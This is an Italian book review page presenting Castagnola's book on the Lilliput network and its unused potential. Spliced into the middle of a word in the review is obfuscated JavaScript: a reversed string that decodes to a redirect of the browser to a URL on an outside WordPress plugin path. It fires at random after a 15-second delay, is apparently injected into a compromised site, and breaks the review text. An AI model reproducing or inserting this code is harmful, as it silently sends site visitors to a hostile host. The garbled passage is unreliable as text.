IL LIBRO – Siamo piccoli ma cresceremo

image_pdfimage_print

Mettersi in rete, lavorare in rete, economista, uno dei più convinti e metodici animatori della rete Lilliput, che al tema del potenziale inespresso dedica con questo libro un’approfondita riflessione. Castagnola passa in rassegna le caratteristiche del lavoro in rete e i suoi punti di forza, evidenzi (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando passo dopo passo gli errori, i difetti di comprensione, le debolezze che hanno finora impedito di mettere pienamente a frutto, da parte di gruppi e associazioni, tutte le risorse umane, culturali e organizzative di cui una rete come Lilliput dispone. Non è quindi un libro autocelebrativo ma uno strumento per agire meglio. (l.g.)

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *